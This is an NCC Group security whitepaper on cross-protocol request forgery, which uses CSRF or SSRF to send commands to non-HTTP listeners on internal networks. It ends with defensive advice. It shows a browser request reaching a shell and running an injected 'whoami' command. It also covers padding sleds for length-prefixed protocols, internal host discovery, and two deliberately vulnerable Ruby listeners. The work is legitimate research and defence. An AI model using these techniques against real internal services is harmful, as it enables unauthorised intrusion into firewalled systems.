Cross-Protocol Request Forgery: NCC Group Whitepaper
Cross-Protocol Request Forgery: NCC Group Whitepaper
Abstract
Server-Side Request Forgery (SSRF) and Cross-Site Request Forgery (CSRF) are two attack
methods that enable attackers to cross network boundaries in order to attack applications,
but can only target applications that speak HTTP. Custom TCP protocols are everywhere:
IoT devices, smartphones, databases, development software, internal web applications, and
more. Often, these applications assume that no security is necessary because they are only
accessible over the local network. This paper aims to be a definitive overview of attacks
that allow cross-protocol exploitation of non-HTTP listeners using CSRF and SSRF, and also
expands on the state of the art in these types of attacks to target length-specified protocols
that were not previously thought to be exploitable.
Table of Contents
1 Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
Prior Research . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Command-Line Listener . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Length-Delimited Listener . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
5 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
This paper both references existing research and expands upon it in later sections. Throughout this whitepaper, refer-
ences are made where possible to existing research on cross-protocol attacks. Many of the techniques contained in this
whitepaper are known to researchers who have explored cross-protocol attacks, but have seldom been discussed in
depth in public research. This whitepaper formally addresses and defines these techniques in order to promote further
exploration of these types of attacks. In later sections, length-specified protocols, authenticated listeners, control and
workarounds of browser behavior are introduced as new cross-protocol exploitation techniques.
This section goes over some background information on how request forgery attacks (CSRF and SSRF) can be used to
target internal networks that an attacker would not otherwise have access to.
This firewall-crossing property has been most strongly associated with SSRF vulnerabilities, and less often with CSRF.
For example, one common SSRF technique is to steal AWS credentials using the AWS metadata service, which only
runs on an internally-accessible IP address. CSRF attacks have been used in this way as well, but the primary target has
been consumer wireless routers,3 due to the inherent limitations of cross-site requests in web browsers.4
The remainder of this section expands on how request forgery attacks (both CSRF and SSRF) can be used to target
internal networks that an attacker would not otherwise have access to. Readers who are already familiar with these
attack types may choose to skip ahead to Attacking Non-HTTP Listeners with Request Forgery on page 6.
XMLHttpRequest is an API, usable in all modern browsers, that allows cross-site requests. In the second line, the
method (POST) and target (a server on the local subnet) are specified. Finally, the send() call allows the request body
to be specified. Using this API, essentially any data - including binary data - can be sent in the request body (usage is
discussed in more detail in Advanced Exploitation and Real-World Debugging on page 11).
1
https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
2
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
3
https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/april/technical-advisory-quentanna/
4
https://www.w3.org/TR/cors/#introduction
One important thing to note is that, in most scenarios, the attacker cannot read the server’s response.5 Most CSRF
attacks need to use a single request, using only known or guessable data, to compromise the targeted device. This
explains why consumer routers have historically been the most common firewall-protected CSRF target. Almost every
router manufacturer has had easily-exploitable code execution vulnerabilities (Asus, D-Link, Netgear, etc.). Further,
consumer routers are extremely popular, rarely up-to-date, and generally have a known, fixed IP address on the
network, all qualities that make them easy to target.
• They are accessible on an internal network to employees within an office or connected using a VPN, or to another
application on the internal network that contains a known SSRF vulnerability.
• The target (though not its IP address or port) has to be known to the attacker. Exploits will be very targeted to
a specific application or device, so the most easily targetable will be open-source web applications (for example,
Jenkins 6 ) and common networked devices like routers.
5
DNS Rebinding does allow attackers to read server responses in some cases, and is explored more in Advanced Exploitation and
Real-World Debugging on page 11.
6
https://groups.google.com/forum/#!topic/jenkinsci-advisories/lJfvDs5s6bk
Any device that can make an HTTP request could potentially be used to attack its own local listeners, including
smartphones, smart TVs, game consoles, and other embedded devices running browsers. Consider a local IT
employee setting up a new Windows server on EC2: it is almost guaranteed they will open a browser to download
software or look up the answer to a question. Can the site that comes up as the fifth search result for “How to configure
X software” be trusted not to attack that very software?
The purpose of the research contained in this paper is to explore the usage of CSRF and SSRF attacks to target non-
HTTP listeners. The motivating idea is the question: “How can we attack TCP listeners that we know are vulnerable, but
can’t reach over the network?” For example, if an Android phone has a local non-HTTP listener for a binary running as
root, is that listener only exploitable from a local application, or could it be targeted from a website as well?
Prior Research
The possibility of using HTTP requests to attack other protocols was first explored in a 2001 whitepaper by Jochen
Topf 7 and revisited in a 2007 whitepaper by NGSSoftware 8 (later acquired by NCC Group). The initial release of
these vulnerabilities caused major browsers to implement port blacklists in order to prevent attacks on specific, known
services. The HTML form techniques used in those papers are relatively outdated; the XMLHttpRequest API is now
much more powerful and can submit arbitrary binary data to any location, without the restrictions of HTML forms.
Since these whitepapers, there have been only a small number of public attacks of this type.9 In 2009, it was used to
achieve cross-site scripting on certain sites through FTP,10 and in 2010, browsers were used to spam IRC servers.11 The
most severe public discussion of a cross-protocol attack was from a 2014 blog post by Nicolas Grégoire. The blog post
attempted to attack Redis’s unauthenticated, text-based network interface. This attack was later expanded to achieve
full remote code execution.
A more in-depth resource on modern cross-protocol attacks was presented in a series of blog posts 12 and conference
talks 13 by Michelle Orru and Ty Miller as part of the BeEF Project. This research developed a working cross-protocol
exploit using XMLHttpRequest for a vulnerable IMAP server.
Across the realm of prior research, many different names have been used for cross-protocol attacks: “Cross-Protocol
Scripting”, “Inter-Protocol Exploitation”, “Cross-Site Printing”, and more. The use of the name “Cross-Protocol Request
Forgery” defines the scope of this paper, which will specifically cover cross-protocol attacks using request forgery
techniques (CSRF or SSRF).
The protocols are typically very simple and forgiving of errors and malformed messages. That is because they are
often created with little testing or used for debugging purposes - hard errors or crashes will be avoided at all costs. In
particular, spewing garbage data at these listeners often earns only a “could not parse message” error.
Almost as a rule, these listeners have high privileges and dangerous functionality. When asked about the security
impact of these listeners, developers tend to argue that their applications should not be exposed to untrusted input
and should always be behind some network control, such as a firewall. But as discussed in the previous section, network
7
https://www.jochentopf.com/hfpa/hfpa.pdf [PDF]
8
https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/inter-protocol_exploitation.pdf [PDF]
9
See also http://bugs.proftpd.org/show_bug.cgi?id=4143#c0, http://seclists.org/fulldisclosure/2010/Mar/447, https://blog.lizzie.
io/exploiting-CVE-2016-8606.html, and https://oaklandsok.github.io/papers/muller2017.pdf [PDF].
10
Cross-protocol XSS with non-standard service ports (Internet Archive link)
11
https://www.theregister.co.uk/2010/01/30/firefox_interprotocol_attack/
12
See http://blog.beefproject.com/2012/11/revitalizing-inter-protocol.html and http://blog.beefproject.com/2014/03/exploiting-
with-beef-bind-shellcode_19.html.
13
https://www.slideshare.net/micheleorru2/rooting-your-internals-exploiting-internal-network-vulns-via-the-browser-using-beef-
bind
Command-Line Interface
The application presents a plaintext CLI-like interface, with or without username/password authentication. Databases
and shells are good examples, but many protocols expect a simple text-based interaction, such as SMTP.
How does this kind of listener respond to an HTTP request? We consider a simple example 14 : busybox’s built-in telnet
server, plus sh. Many embedded devices use a similar setup:
The Telnet protocol is essentially just raw ASCII, plus some non-critical control bytes. It’s possible to use netcat to talk
to this listener:
What will this listener do when it sees a web request? These lines, runnable in a developer console, demonstrate the
issue:
POST / HTTP/1.1
Host: localhost:2001
Connection: keep-alive
Content-Length: 23
Origin: http://www.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0
.3202.94 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://www.example.com/
Accept-Encoding: gzip, deflate, br
14
This example is intentionally simplified for ease of explanation. It may not work reliably in the real world, because busybox’s
telnetd may stop processing input when the browser closes the connection upon receiving a malformed response. For an example
that more reliably demonstrates the problem, see Example Vulnerable Listeners on page 14.
The request is just plain ASCII - exactly what the listener expects. Of course, POST, Host and Connection all don’t mean
anything to bash, but that is fine. It just waits for the next valid command.
$ POST / HTTP/1.1
/bin/sh: 8: POST: not found
$ Host: localhost:2001
/bin/sh: 9: Host:: not found
$ Content-Length: 23
/bin/sh: 11: Content-Length:: not found
...
$ whoami > /tmp/test.txt
Once the listener reaches the body, it finally reads a valid command and will execute it. Turning this type of exploit
into a script or webpage is straightforward. For a real-world example where this might be exploited, consider CVE-
2017-8224: the Chinese “WIFICAM” security camera uses a telnet listener with a weak, static password.15 (For some
comments on exploiting an authenticated listener, see Advanced Exploitation and Real-World Debugging on page 11.)
Many types of delimited protocols are functionally similar to the command-line interface pattern and can be exploited
similarly easily. In a command-line interface, the delimiter is a newline (\x0d\x0a); protocols that use null-bytes to
indicate a boundary are also common. Some listeners may look for a delimiter on either side of a payload: for example,
a server that expects a sequence of XML messages starting with <xml> and ending with </xml>.
Length-Specified Protocols
Many simple protocols will read a length value, then read that number of bytes before processing a message. Slightly
more complex variations may require a fixed-length header or use full Type-Length-Value format. Again, the common
thread among vulnerable services is that malformed messages are simply ignored, and subsequent messages are
processed normally.
The simplest example is a protocol that expects a single length byte and then reads that many bytes. What does an
HTTP request look like to such a listener? Imagine sending a POST request with the body “blahblahblah”:
POST / HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 12
Origin: http://www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Ge
cko) Chrome/61.0.3163.100 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Referer: http://www.example.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
blahblahblah
Assuming the entire HTTP request is present in the input buffer, the listener will process it as follows:
1. Immediately read a single byte (“P”) and interpret it as a length in bytes: 0x50, or 80 bytes.
15
See comments on http://nm-projects.de/2017/01/hacking-ip-camera-digoo-bb-m2-part-3-getting-root-access/.
3. The processed message was invalid and is dropped. The listener continues processing the input buffer.
4. Repeat until the input buffer is exhausted: read a single byte (“r”), interpret it as a length (114 bytes), pop that many
bytes from the input buffer, and process them as a message.
5. If there are not enough bytes in the input buffer to retrieve a full message (step 2), wait until more data is retrieved
from the network.
The full example is worked in the figure below. The most immediate takeaway from the example is that this type of
listener requires data to be padded and length-adjusted in order to be processed correctly. If an exploit payload is
simply copied into the body of a request, the listener will not process the payload correctly. Instead, the listener will
have interpreted some byte in the headers as a length, causing the payload to be only partially processed - and, almost
surely, processed incorrectly.
Figure 4: A length-specified protocol expects one to four bytes to specify a length, then reads that many bytes before
processing a message. Each red character is a byte interpreted as a length, and each underlined section is interpreted
as a message.
If the HTTP headers are exactly known, it is relatively easy to pad the request body to exactly the right length. Then,
an exploit that works from a local network can (by prepending the correct padding) be transposed directly into an
exploit that works from a web browser. However, it is difficult to rely on the header ordering and length; these values
Instead of exact byte-counting, most protocols can be padded in a browser-independent way to create reliable
exploits. For many protocols, CPRF exploits can be padded using a “sled” of short or empty messages in the same
manner as a NOP sled. In the above example, simply prepending a string of null bytes to the request body will cause
the parser to slide through a sequence of empty messages until it reaches the exploit.
This trick is less likely to be successful with more complex protocols. In the worst case, a CSRF or SSRF request can
be sent repeatedly, with increasingly-large padding, until all possible paddings have been exhausted. On one hand,
this strategy is most effective for protocols with small (single-byte) length fields. On the other hand, protocols with
length fields of two or more bytes are likely to read the entirety of the HTTP headers as a single message, making exact
counting and padding straightforward.
Cross-Protocol Request Forgery can be used for extremely predictable and consistent exploitation of many services.
However, the design of a CPRF exploit often runs into a number of frustrating real-world stumbling blocks. This section
attempts to discuss stumbling blocks experienced by the author that can be overcome with some minor modifications
to most exploits.
1. Discover the internal IP address range. The JavaScript WebRTC API allows leakage of the host’s internal IP
address,16 while SSRF vulnerabilities can usually be used to discover the IP address of a live internal host. Similarly,
XMLHttpRequest timing information can be used to discover live hosts.17
2. Systematically target the exploit at all addresses on the internal network. XMLHttpRequest and SSRF vulnerabilities
are both generally limited only by the speed of the connection to a destination; automating CPRF attacks is
straightforward as long as the exploit is relatively small and reliable.
• HTTP Verb: Can be GET, POST, HEAD, or OPTIONS, but POST is the most useful request type as no other request can
contain content within the body.
• Host and Origin Headers: These headers contain the domain name, which an attacker can set up to reflect arbitrary
internal IP addresses. As a result, they can contain any valid domain characters (unicode domains are, unfortunately,
converted to punycode representations).
• CORS-Safelisted Headers: Any safelisted header can have an attacker-specified value, including arbitrary binary
data (but not null bytes, line breaks, or carriage returns). These headers are: Accept, Accept-Language, Content-
Language, Last-Event-ID, DPR, Save-Data, Viewport-Width, and Width. The Content-Type header can also be
modified, but its value is restricted.
POST bodies sent with XMLHttpRequest can contain arbitrary binary data, including newlines and null bytes. Payloads
containing any ASCII data (i.e. no bytes greater then 0x7f) can be passed directly to the send() call as a string. To
include non-ASCII data, payloads should be converted to a Blob or ArrayBuffer. When using XMLHttpRequest, HTTP
bodies are generally not mangled by the browser, regardless of the Content-Type value.
Authenticated Listeners
Authentication prompts can be a major impediment to a successful exploit. Assuming an authenticated listener has
known or easily-guessable credentials, it is still possible to target these listeners. In the author’s experience, the
following points are worth keeping in mind:
• Username and password values have to be delivered in order and at the right time. When developing the exploit,
count the number of lines sent by the browser to make sure that the listener receives the correct values. Listeners
that close connections after only a small number of login attempts may be impossible to exploit.
• Listeners which perform expensive password hashing may or may not be exploitable. MD5 is quick enough to be
essentially ignored, but bcrypt can take so long that the connection is closed before any payload is delivered.
16
https://browserleaks.com/webrtc
17
https://github.com/beefproject/beef/wiki/Network-Discovery#identify-lan-subnets
18
For more information, see https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS or https://xhr.spec.whatwg.org/.
• HTTPS: HTTP over a TLS-encrypted channel. Connections can easily be created by specifying the protocol, but the
only easily-modifiable value in the handshake is the SNI hostname. HTTPS may be useful to exploit TLS-enabled
listeners in the same way as plain TCP listeners.
• FTP: Browsers support FTP file servers, but the author is unaware of whether it is possible to perform useful control
over these connections using JavaScript. As a result, it seems unlikely that FTP is more useful than HTTP.
• Websockets (WS and WSS): Websockets are essentially a direct TCP connection between hosts. However, a
Websocket connection can only be created by performing a valid HTTP handshake and response; non-Websocket-
aware listeners will never create a valid response, which is necessary for the browser to upgrade the connection.
• QUIC and HTTP/2: These new browser protocols do not seem to be useful for cross-protocol exploitation as there
is currently no way to control them using JavaScript.
As a workaround, padding the end of the request body with a large amount of unimportant data often causes the
browser and listener to hold the connection open for longer, in order to force the listener to process the payload that
appears at the start of the body.
Alternatively, using the Fetch API may cause browsers to hold connections open longer if the keepalive flag is set.
(Fetch is a newer alternative to XMLHttpRequest supported in the major browsers; for the purposes of cross-protocol
attacks, the functionality of the two APIs is essentially the same.)
TCP Segmentation
TCP connections are buffered. They wait for some minimum amount of data before sending, and will generally send
only a maximum amount of data at a time. As a result, the network driver will split up sent data into a number of TCP
data units (“segments”) depending on when it receives the data from the application and the size of the data. For
example, when sending an HTTP request of 55876 bytes (Chrome on OS X), Wireshark shows:
The first segment (394 bytes) is the HTTP header, which Chrome passes in the initial network write. In a second network
write, Chrome sends the body. So, the body is split up into three maximum-sized (16384 byte) segments with the final
segment containing all leftover data.
Generally, browsers will process and send request data quickly enough that segmentation does not affect how most
listeners handle data. However, for listeners that are sensitive to data lengths, it may be helpful to craft payloads
carefully in order to cause reads at specific locations in the incoming data.
HTTP Proxies
HTTP proxies, such as Burp Suite or mitmproxy, generally do a reasonable job of not modifying the actual text of a
request and response. The underlying TCP connection, however, is completely changed. Further, these proxies do
not handle non-HTTP data well. It will likely be significantly more difficult to develop a successful exploit through an
intercepting proxy, and the exploit will more-than-likely not succeed without modification when run without the proxy.
The author strongly recommends disabling all proxies between the browser and target, and using a tool such
as Wireshark to view data on-the-wire. Alternatively, consider directly debugging the listener or adding logging
statements around network handling.
Command-Line Listener
This server demonstrates a command-line interface:
require 'socket'
loop do
Thread.start(server.accept) do |client|
client.write "cli> "
until client.eof?
line = client.gets
case line
when /^echo ?['"]?([\w ]+)?['"]?/
client.puts $1
when /^win ['"]?([\w -]+)['"]?/
f = open("./winners.txt", "a")
f.write($1 + " won!\n")
f.close
when /^(help)|\?$/
client.puts "echo [string] - print a string"
client.puts "win [name] - win the game"
client.puts "help - print this help"
client.puts "quit - quit this console"
when /^quit/
client.puts "bye!"
break
else
client.puts "unknown command"
end
client.flush
client.write "cli> "
end
client.close
end
end
require 'socket'
require 'json'
def client_loop(client)
len = client.readbyte
data = client.read(len)
message = {}
begin
message = JSON.parse(data)
rescue JSON::ParserError
STDOUT.puts "Malformed message"
rescue Exception => e
STDOUT.puts "Unknown Error"
end
if /([\w\d -]{2,})/.match(message["name"])
f = open("./winners.txt", "a")
f.write($1 + " won!\n")
f.close
end
return
end
loop do
Thread.start(server.accept) do |client|
begin
until client.eof?
client_loop(client)
end
rescue Exception => e
STDOUT.puts e
ensure
client.close
end
end
end
A successful exploit is more complicated, requiring padding before the payload (the amount of padding was chosen
arbitrarily):
At an infrastructure level, organizations should consider architecting their networks to completely prevent web
browsers from making requests to non-web applications. For example, firewalling all ports except 80 and 443 into a
virtual network which is accessible only via a bastion host will prevent cross-protocol attacks from employee machines.
Non-HTTP services can then be accessed via the bastion host, but will not be vulnerable to attacks from web browsers
or SSRF in servers outside the virtual network. This does not represent a full solution to the problem, but is a solid first
line of defense.
At an application level, CPRF vulnerabilities can be prevented by ensuring that all local listeners require a handshake
before exchanging messages. This type of handshake can be as simple as a back-and-forth “hello,” but failed or
malformed handshake messages must cause the connection to be immediately closed. Essentially, it needs to be
impossible to replicate a valid handshake using HTTP. Most importantly, developers must consider the possibility of
malicious requests being made to their network listeners - even if those listeners are on a private network, or only listen
on localhost. Strongly authenticating these channels (rather than relying on the security of the network) is absolutely
critical.